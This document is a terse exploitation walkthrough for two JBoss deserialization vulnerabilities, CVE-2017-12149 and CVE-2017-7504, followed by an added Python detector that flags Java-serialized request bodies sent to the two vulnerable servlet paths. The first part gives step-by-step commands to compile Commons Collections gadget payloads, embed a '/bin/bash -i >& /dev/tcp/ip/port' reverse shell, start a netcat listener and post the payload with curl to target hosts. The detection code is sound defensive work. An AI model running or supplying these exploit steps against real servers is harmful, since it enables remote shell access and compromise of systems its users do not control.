JBoss Application Server deserialization vulnerability
CVE-2017-12149
http://192.168.11.123:8080/invoker/readonly
1: Compile the class that generates the binary payload file
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
2: Set the IP and port of the host that will accept the shell (this writes the .ser payload file)
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
3: Open a new terminal and start a listener
nc -vv -l 4444
4: Use curl to send the attack payload to the target server.
curl http://192.168.11.123:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
CVE-2017-7504
http://192.168.112.132:8080/jbossmq-httpil/HTTPServerILServlet/
Usage example:
1)
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java
2)
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 '/bin/bash -i >& /dev/tcp/ip/port <&1'
3)
nc -lvvp 4444
4)
curl http://192.168.112.132:8080/jbossmq-httpil/HTTPServerILServlet/ --data-binary @ExampleCommonsCollections1.ser
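
Detection example (added here, not part of the original write-up): both procedures above end by sending a Java-serialized .ser file as the HTTP body to a JBoss servlet path, so a defender can flag requests to those two paths whose body starts with the Java serialization stream header. The request records, source addresses and the class name ExampleClass are constructed for illustration.

```python
import posixpath
from urllib.parse import unquote

# Java Object Serialization Stream header: STREAM_MAGIC 0xACED + STREAM_VERSION 0x0005.
JAVA_MAGIC = b"\xac\xed\x00\x05"
# The two servlet paths this page names as receiving serialized objects over HTTP.
WATCHED_PATHS = ("/invoker/readonly", "/jbossmq-httpil/HTTPServerILServlet")
# Class names are stored in clear text in a stream, so the package prefix is searchable.
CC_PREFIX = b"org.apache.commons.collections"

def normalize(raw_path):
    """Strip the query string, percent-decode once, collapse '//', '.', '..', trailing '/'."""
    path = unquote(raw_path.split("?", 1)[0])
    return "/" + posixpath.normpath(path).lstrip("/")

def classify(raw_path, body):
    """Return findings for one captured HTTP request (empty list: nothing to report)."""
    path = normalize(raw_path)
    if not any(path == p or path.startswith(p + "/") for p in WATCHED_PATHS):
        return []
    findings = []
    if body.startswith(JAVA_MAGIC):
        findings.append("java-serialized-body")
    if CC_PREFIX in body:
        findings.append("commons-collections-classes")
    return findings

# Constructed sample: stream header, TC_OBJECT (0x73), TC_CLASSDESC (0x72), then a
# length-prefixed class name. "ExampleClass" is a made-up name, not a real class.
_name = CC_PREFIX + b".ExampleClass"
SAMPLE_BODY = JAVA_MAGIC + b"\x73\x72" + len(_name).to_bytes(2, "big") + _name

# Constructed request records: (source address, request path, request body).
SAMPLE_REQUESTS = [
    ("10.0.0.5", "/invoker/readonly", SAMPLE_BODY),
    ("10.0.0.5", "//jbossmq-httpil/HTTPServerILServlet/", JAVA_MAGIC + b"\x70"),
    ("10.0.0.9", "/invoker/%72eadonly?x=1", SAMPLE_BODY),
    ("10.0.0.7", "/index.html", SAMPLE_BODY),          # not a watched path
    ("10.0.0.7", "/invoker/readonly", b"name=value"),  # watched path, ordinary form body
]

def scan(requests):
    """Return (source, normalized path, findings) for each request that has findings."""
    rows = ((src, normalize(p), classify(p, body)) for src, p, body in requests)
    return [row for row in rows if row[2]]

if __name__ == "__main__":
    print(*scan(SAMPLE_REQUESTS), sep="\n")
```

Neither servlet path needs to be reachable from untrusted networks, so any hit on a production host is worth investigating even when only the first finding fires.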